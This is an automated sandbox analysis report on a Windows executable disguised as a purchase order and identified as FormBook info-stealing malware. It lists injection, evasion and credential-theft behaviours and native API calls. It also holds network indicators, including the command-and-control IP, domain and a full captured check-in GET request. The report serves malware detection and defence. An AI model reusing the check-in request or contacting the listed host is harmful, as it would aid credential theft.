
Windows Analysis Report
2998MOD PO.exe

Overview

General Information

Sample name: 2998MOD PO.exe
Analysis ID: 1542414
MD5: eba2ade6a60568538d8b918f65fa2f44
SHA1: fbb6cb7c1c403502560bfe74340b06f31775a7eb
SHA256: 7b70d479034f458a6b695cc3c8aefd50c771ec183b749276aa66d18a6a33466c
Tags: exe, user-threatcat_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Creation with Colorcpl
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 2998MOD PO.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\2998MOD PO.exe" MD5: EBA2ADE6A60568538D8B918F65FA2F44)
    • 2998MOD PO.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\2998MOD PO.exe" MD5: EBA2ADE6A60568538D8B918F65FA2F44)
    • 2998MOD PO.exe (PID: 7696 cmdline: "C:\Users\user\Desktop\2998MOD PO.exe" MD5: EBA2ADE6A60568538D8B918F65FA2F44)
      • sePlrCtAXqpc.exe (PID: 2500 cmdline: "C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • colorcpl.exe (PID: 7924 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
          • sePlrCtAXqpc.exe (PID: 3496 cmdline: "C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8048 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.2288704216.0000000004A40000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2041194663.00000000018F0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.2288668245.00000000049F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.3564602723.0000000004DF0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.2998MOD PO.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.2998MOD PO.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7924, TargetFilename: C:\Users\user

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-25T22:10:39.644215+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 3.33.130.190 | 80 | TCP

AV Detection

Source: 2998MOD PO.exe | ReversingLabs: Detection: 68%
Source: Yara match | File source: 4.2.2998MOD PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.2998MOD PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2288704216.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2041194663.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2288668245.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3564602723.0000000004DF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3560962985.0000000002F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2042765684.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 2998MOD PO.exe | Joe Sandbox ML: detected
Source: 2998MOD PO.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2998MOD PO.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: colorcpl.pdbGCTL source: 2998MOD PO.exe, 00000004.00000002.2040956683.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560731508.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: colorcpl.pdb source: 2998MOD PO.exe, 00000004.00000002.2040956683.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560731508.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sePlrCtAXqpc.exe, 00000007.00000002.3560434817.0000000000DBE000.00000002.00000001.01000000.0000000C.sdmp, sePlrCtAXqpc.exe, 00000009.00000002.3562689546.0000000000DBE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: 2998MOD PO.exe, 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2043927456.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2041561877.0000000004929000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 2998MOD PO.exe, 2998MOD PO.exe, 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000003.2043927456.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2041561877.0000000004929000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: SWBp.pdb source: 2998MOD PO.exe
                Source: Binary string: SWBp.pdbSHA256Y source: 2998MOD PO.exe
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 4x nop then mov ebx, 00000004h | 8_2_04B404E0

Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 3.33.130.190:80
Source: Joe Sandbox View | IP Address: 3.33.130.190
Source: Joe Sandbox View | ASN Name: AMAZONEXPANSIONGB
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /up8i/?Ax=9lO0gd2hrt6dKrz&1b80hL3=FonQAt5G6G0h5a/xcW34pfv7cxcrms3RfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQdsR1nmqFV7MzuwwVkSFycHqtReIUzDRqobl4= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Connection: close
    Host: www.ladylawher.org
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic | DNS traffic detected: DNS query: www.ladylawher.org

E-Banking Fraud

Source: Yara match | File source: 4.2.2998MOD PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.2998MOD PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2288704216.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2041194663.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2288668245.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3564602723.0000000004DF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3560962985.0000000002F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2042765684.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0042C433 NtClose,4_2_0042C433
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0040A9E3 NtResumeThread,4_2_0040A9E3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2B60 NtClose,LdrInitializeThunk,4_2_019C2B60
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_019C2DF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_019C2C70
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C35C0 NtCreateMutant,LdrInitializeThunk,4_2_019C35C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C4340 NtSetContextThread,4_2_019C4340
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C4650 NtSuspendThread,4_2_019C4650
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2B80 NtQueryInformationFile,4_2_019C2B80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2BA0 NtEnumerateValueKey,4_2_019C2BA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2BF0 NtAllocateVirtualMemory,4_2_019C2BF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2BE0 NtQueryValueKey,4_2_019C2BE0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2AB0 NtWaitForSingleObject,4_2_019C2AB0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2AD0 NtReadFile,4_2_019C2AD0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2AF0 NtWriteFile,4_2_019C2AF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2DB0 NtEnumerateKey,4_2_019C2DB0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2DD0 NtDelayExecution,4_2_019C2DD0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2D10 NtMapViewOfSection,4_2_019C2D10
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2D00 NtSetInformationFile,4_2_019C2D00
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2D30 NtUnmapViewOfSection,4_2_019C2D30
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2CA0 NtQueryInformationToken,4_2_019C2CA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2CC0 NtQueryVirtualMemory,4_2_019C2CC0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2CF0 NtOpenProcess,4_2_019C2CF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2C00 NtQueryInformationProcess,4_2_019C2C00
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2C60 NtCreateKey,4_2_019C2C60
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2F90 NtProtectVirtualMemory,4_2_019C2F90
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2FB0 NtResumeThread,4_2_019C2FB0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2FA0 NtQuerySection,4_2_019C2FA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2FE0 NtCreateFile,4_2_019C2FE0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2F30 NtCreateSection,4_2_019C2F30
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2F60 NtCreateProcessEx,4_2_019C2F60
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2E80 NtReadVirtualMemory,4_2_019C2E80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2EA0 NtAdjustPrivilegesToken,4_2_019C2EA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2EE0 NtQueueApcThread,4_2_019C2EE0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2E30 NtWriteVirtualMemory,4_2_019C2E30
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C3090 NtSetValueKey,4_2_019C3090
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C3010 NtOpenDirectoryObject,4_2_019C3010
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C39B0 NtGetContextThread,4_2_019C39B0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C3D10 NtOpenProcessToken,4_2_019C3D10
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C3D70 NtOpenThread,4_2_019C3D70
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF4650 NtSuspendThread,LdrInitializeThunk,8_2_04CF4650
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF4340 NtSetContextThread,LdrInitializeThunk,8_2_04CF4340
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_04CF2CA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2C60 NtCreateKey,LdrInitializeThunk,8_2_04CF2C60
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_04CF2C70
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2DD0 NtDelayExecution,LdrInitializeThunk,8_2_04CF2DD0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_04CF2DF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_04CF2D10
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_04CF2D30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_04CF2EE0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_04CF2E80
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2FE0 NtCreateFile,LdrInitializeThunk,8_2_04CF2FE0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2FB0 NtResumeThread,LdrInitializeThunk,8_2_04CF2FB0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2F30 NtCreateSection,LdrInitializeThunk,8_2_04CF2F30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2AD0 NtReadFile,LdrInitializeThunk,8_2_04CF2AD0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2AF0 NtWriteFile,LdrInitializeThunk,8_2_04CF2AF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_04CF2BE0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04CF2BF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_04CF2BA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2B60 NtClose,LdrInitializeThunk,8_2_04CF2B60
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF35C0 NtCreateMutant,LdrInitializeThunk,8_2_04CF35C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF39B0 NtGetContextThread,LdrInitializeThunk,8_2_04CF39B0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2CC0 NtQueryVirtualMemory,8_2_04CF2CC0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2CF0 NtOpenProcess,8_2_04CF2CF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2C00 NtQueryInformationProcess,8_2_04CF2C00
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2DB0 NtEnumerateKey,8_2_04CF2DB0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2D00 NtSetInformationFile,8_2_04CF2D00
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2EA0 NtAdjustPrivilegesToken,8_2_04CF2EA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2E30 NtWriteVirtualMemory,8_2_04CF2E30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2F90 NtProtectVirtualMemory,8_2_04CF2F90
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2FA0 NtQuerySection,8_2_04CF2FA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2F60 NtCreateProcessEx,8_2_04CF2F60
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2AB0 NtWaitForSingleObject,8_2_04CF2AB0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2B80 NtQueryInformationFile,8_2_04CF2B80
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF3090 NtSetValueKey,8_2_04CF3090
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF3010 NtOpenDirectoryObject,8_2_04CF3010
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF3D70 NtOpenThread,8_2_04CF3D70
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF3D10 NtOpenProcessToken,8_2_04CF3D10
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04B4EF7E NtQueryInformationProcess,NtReadVirtualMemory,8_2_04B4EF7E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE8F04_2_019BE8F0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199A8404_2_0199A840
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019928404_2_01992840
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A46BD74_2_01A46BD7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4AB404_2_01A4AB40
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA804_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A8DBF4_2_019A8DBF
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198ADE04_2_0198ADE0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199AD004_2_0199AD00
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2CD1F4_2_01A2CD1F
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A30CB54_2_01A30CB5
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980CF24_2_01980CF2
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990C004_2_01990C00
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0EFA04_2_01A0EFA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01982FC84_2_01982FC8
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A32F304_2_01A32F30
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B0F304_2_019B0F30
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019D2F284_2_019D2F28
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A04F404_2_01A04F40
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A2E904_2_019A2E90
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4CE934_2_01A4CE93
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4EEDB4_2_01A4EEDB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4EE264_2_01A4EE26
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990E594_2_01990E59
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199B1B04_2_0199B1B0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A5B16B4_2_01A5B16B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197F1724_2_0197F172
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C516C4_2_019C516C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4F0E04_2_01A4F0E0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A470E94_2_01A470E9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019970C04_2_019970C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A3F0CC4_2_01A3F0CC
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019D739A4_2_019D739A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4132D4_2_01A4132D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197D34C4_2_0197D34C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019952A04_2_019952A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A312ED4_2_01A312ED
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AB2C04_2_019AB2C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AD2F04_2_019AD2F0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2D5B04_2_01A2D5B0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A475714_2_01A47571
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4F43F4_2_01A4F43F
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019814604_2_01981460
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4F7B04_2_01A4F7B0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A416CC4_2_01A416CC
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019D56304_2_019D5630
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A259104_2_01A25910
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019999504_2_01999950
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AB9504_2_019AB950
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019938E04_2_019938E0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FD8004_2_019FD800
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AFB804_2_019AFB80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A05BF04_2_01A05BF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019CDBF94_2_019CDBF9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4FB764_2_01A4FB76
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A31AA34_2_01A31AA3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2DAAC4_2_01A2DAAC
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019D5AA04_2_019D5AA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A3DAC64_2_01A3DAC6
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A03A6C4_2_01A03A6C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A47A464_2_01A47A46
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4FA494_2_01A4FA49
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AFDC04_2_019AFDC0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A47D734_2_01A47D73
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01993D404_2_01993D40
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A41D5A4_2_01A41D5A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4FCF24_2_01A4FCF2
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A09C324_2_01A09C32
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01991F924_2_01991F92
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4FFB14_2_01A4FFB1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4FF094_2_01A4FF09
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01999EB04_2_01999EB0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D6E4F6
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D72446
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D64420
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D80591
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CC0535
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CDC6E0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CBC7C0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CE4750
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CC0770
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D52000
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D781CC
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D801AA
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D741A2
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D48158
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CB0100
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D5A118
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D402C0
